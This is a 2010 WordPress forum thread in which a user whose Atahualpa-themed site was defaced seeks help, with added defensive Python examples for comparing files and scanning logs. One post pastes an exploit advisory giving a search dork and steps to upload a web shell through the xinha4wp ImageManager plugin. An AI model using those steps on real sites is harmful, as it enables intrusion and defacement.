Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021


My site has been hacked - atahualpa 3.4.6


  #1  
Old Jun 15, 2010, 08:38 AM
Mikii
 
23 posts · Jul 2009
Hi.

My WordPress website was just hacked. I strongly suspect Atahualpa, because re-downloading and re-installing it (version 3.4.6) solved the problem.

Any page of the website showed this crew signature: "uah-crew".

The "hacked" 3.4.6 version is available for reviewing. Just PM or email me and I'll send it to you.

Thanks for the attention.

Michele
  #2  
Old Jun 15, 2010, 09:16 AM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
I would suspect it is your WordPress and/or server that was hacked.
Who is your host?
Contact them and tell them you have been hacked.

What version of WordPress are you running?
Use FTP and go look at the dates on all your other themes and all other WordPress files and see if there are any with a date that doesn't match the others.
Change your WordPress admin password.
Check all users in WordPress.
Change your FTP password.
Look to see if there are any other FTP users you don't know.
Change your cPanel/host password, and check to see if there are any others you don't recognize.
Scan your WordPress database for any potential SQL injections.

Do a Google search on 'wordpress hacked' and follow the directions.

This is not a fun thing to have happen or an easy thing to have fixed. Hundreds of WordPress sites were hacked into a couple of months ago at Bluehost, and it was a server security issue.

Good luck recovering.
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #3  
Old Jun 15, 2010, 09:49 AM
Mikii
 
23 posts · Jul 2009
Dear juggledad,

All I can say is that public_html/wp-content/themes/atahualpa/index.php had been re-written. I am still investigating how. WP is 2.9.2.

The original directory has already been replaced on server, and re-installing Atahualpa solved the problem.

Thanks for your suggestions, please feel free to change the subject of this post if you feel it's not an atahualpa "hole".

Will keep you posted.
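Added example (not written by anyone in this thread): one way to carry out the date check suggested in post #2 and confirm a rewritten theme file like the one reported in post #3, by comparing the installed theme with a freshly downloaded copy. The function names, the one-day window and the sample file names are assumptions made for this illustration.

```python
import hashlib
import os
import tempfile
import time
from pathlib import Path

def snapshot(root):
    """Map each file path (relative to root) to (sha256, mtime)."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix():
            (hashlib.sha256(p.read_bytes()).hexdigest(), p.stat().st_mtime)
        for p in root.rglob("*") if p.is_file()
    }

def compare_theme(installed_dir, clean_dir, window_days=1.0):
    """Compare an installed theme against a freshly downloaded clean copy."""
    installed, clean = snapshot(installed_dir), snapshot(clean_dir)
    # Content check: a timestamp can be reset after a change, a hash cannot.
    modified = sorted(f for f in installed
                      if f in clean and installed[f][0] != clean[f][0])
    added = sorted(f for f in installed if f not in clean)
    missing = sorted(f for f in clean if f not in installed)
    # Date check: files whose mtime is far from the median of the install.
    mtimes = sorted(m for _, m in installed.values())
    median = mtimes[len(mtimes) // 2] if mtimes else 0.0
    odd_dates = sorted(f for f, (_, m) in installed.items()
                       if abs(m - median) > window_days * 86400)
    return {"modified": modified, "added": added,
            "missing": missing, "odd_dates": odd_dates}

def demo():
    """Constructed sample: a clean theme and a copy with index.php rewritten."""
    base = Path(tempfile.mkdtemp())
    clean, live = base / "clean", base / "live"
    old = time.time() - 90 * 86400  # pretend the theme was installed 90 days ago
    names = ("index.php", "functions.php", "style.css", "header.php", "footer.php")
    for tree in (clean, live):
        tree.mkdir()
        for name in names:
            (tree / name).write_text("original " + name)
            os.utime(tree / name, (old, old))
    (live / "index.php").write_text("rewritten")  # content and mtime change
    (live / "extra.php").write_text("unknown")    # file not shipped with theme
    return compare_theme(live, clean)

if __name__ == "__main__":
    print(demo())
```

Files listed under `modified` or `added` are worth keeping as evidence before the theme directory is replaced, since they show what was changed and when.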
  #4  
Old Jun 15, 2010, 10:38 AM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
You have WordPress installed in 'public_html'???? How secure is it?
Who is the host?
What is the URL?
  #5  
Old Jun 15, 2010, 10:50 AM
Mikii
 
23 posts · Jul 2009
URL is www.tendertonaveitalia.net

Host is hostingplan.net / cPanel / Linux

Pardon my ignorance, what is wrong with putting WordPress in your root home directory?

Thanks.
  #6  
Old Jun 15, 2010, 10:51 AM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
When I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?
  #7  
Old Jun 15, 2010, 11:16 AM
Mikii
 
23 posts · Jul 2009
Quote:
Originally Posted by juggledad
When I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.

Have you contacted the host to see if anyone else was hacked?
I see. "public html" is just an alias to "www". It's the place where all the "web" stuff goes.

Yes, I did contact my host. Hopefully they'll find out how the hacker got his hands on the index.php.

Thank you for your feedback. Cheers!
  #8  
Old Jun 15, 2010, 12:09 PM
DannyLife
 
40 posts · Nov 2009
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.
  #9  
Old Jun 15, 2010, 12:32 PM
Mikii
 
23 posts · Jul 2009
Quote:
Originally Posted by DannyLife
I had a site get hacked not too long ago with exactly the same method. It wasn't anything to do with the theme, apparently they got in through a plug-in that I hadn't updated. So check and make sure they're all up to the current version.
Yes, I found this via Google. Only: I do not have ImageManager installed. Was this your plugin?

------
===============================================================
Wordpress xinha4wp xinha_core plugins File Upload Vulnerability
===============================================================

####################################################################

Author : Hackeri-AL
Contact : hackeri-al[at]live[dot]com
Greetz : LoocK3D & all Albania and Kosova Hackers
My Group : UAH-Crew = United Albania Hackers

####################################################################

[~] DORK: /imagemanager/demo_images/wp/ site: com ,de , org / etc...

--------------------------------------------------------------------

[~] You go to: htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/
[~] Then we : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/manager.php <[ upload here shell ]
[~] Shell : htpp://web.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/yourShell.php

####################################################################

[~] Video: http://www.youtube.com/watch?v=BG-OVjG8dcs

####################################################################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

####################################################################


# Inj3ct0r.com [2010-04-16]

------
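Added example (not part of any post in this thread): a log check a site owner could run to see whether requests matching the advisory pasted above ever reached their server, using only the plugin path it names. The log lines, IP addresses and the file name `sample.php` are constructed for illustration, and the Apache "combined" log format is an assumption.

```python
import re
from urllib.parse import unquote

# Plugin path taken from the advisory quoted in the thread.
PLUGIN = "/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/"

# Combined log format: client, timestamp, request line, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
SCRIPT = re.compile(r"\.(php\d?|phtml)$")

def classify(line):
    """Return (ip, timestamp, reason, path, status) for a suspicious hit, else None."""
    m = LINE.match(line)
    if not m:
        return None  # malformed or non-HTTP line
    # Drop the query string, decode %xx escapes, compare case-insensitively.
    path = unquote(m["target"].split("?", 1)[0]).lower()
    if PLUGIN.lower() not in path:
        return None
    if m["method"] == "POST" and path.endswith("/manager.php"):
        reason = "POST to upload endpoint"
    elif "/demo_images/" in path and SCRIPT.search(path):
        reason = "script requested from image directory"
    else:
        return None  # e.g. an ordinary image fetch
    return (m["ip"], m["ts"], reason, path, int(m["status"]))

def scan(lines):
    """Return all suspicious hits in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jun/2010:21:03:11 -0600] "GET /index.php HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [14/Jun/2010:22:40:02 -0600] "GET {PLUGIN}demo_images/wp/photo.jpg HTTP/1.1" 200 9000',
    f'198.51.100.7 - - [14/Jun/2010:22:41:15 -0600] "POST {PLUGIN}manager.php HTTP/1.1" 200 812',
    f'198.51.100.7 - - [14/Jun/2010:22:41:40 -0600] "GET {PLUGIN}demo_images/sample.php?x=1 HTTP/1.1" 200 64',
    "not a log line",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the plugin path exists on the server; a 404 on every such request suggests the site was only probed.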
  #10  
Old Jun 15, 2010, 12:58 PM
DannyLife
 
40 posts · Nov 2009
Sorry, I never got to see the details. My host dealt with it and informed me that I needed to update the plug-ins. I wasn't using ImageManager either though.
  #11  
Old Jun 15, 2010, 01:15 PM
Mikii
 
23 posts · Jul 2009
I see. Thanks. All my plugins are updated now. Hope my host will be able to tell me what the problem was.
  #12  
Old Jun 17, 2010, 10:09 PM
Knut Sparhell
 
34 posts · Jun 2010
Fredrikstad, Norway
Quote:
Originally Posted by juggledad
When I see 'public' in a folder name, alarms go off. Now it might be quite secure, but I'd check it out. It's just me being nervous.
The public_html alias www is the standard naming (by Linux-based web hosts) of the user folder that will serve as the root folder for the web site. Similar to public_ftp for your FTP site. It's just a name. It doesn't imply it initially has write access for everyone.

All times are GMT -6.